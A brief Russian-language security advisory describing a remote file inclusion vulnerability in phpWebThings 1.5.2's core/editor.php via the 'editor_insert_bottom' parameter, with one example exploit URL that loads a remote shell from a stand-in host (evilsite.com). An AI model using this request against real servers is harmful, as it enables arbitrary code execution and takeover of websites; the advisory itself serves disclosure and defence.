Программа: phpWebThings 1.5.2
Уязвимость позволяет злоумышленнику выполнить произвольный сценарий на целевой системе. Уязвимость существует из-за ошибки в обработке входных данных в параметре «editor_insert_bottom» сценарием editor.php. Атакующий может выполнить произвольный сценарий в контексте безопасности Web сервера.
Пример:
http://[target]/[path]/core/editor.php?editor_insert_bottom=http://evilsite.com/shell.php
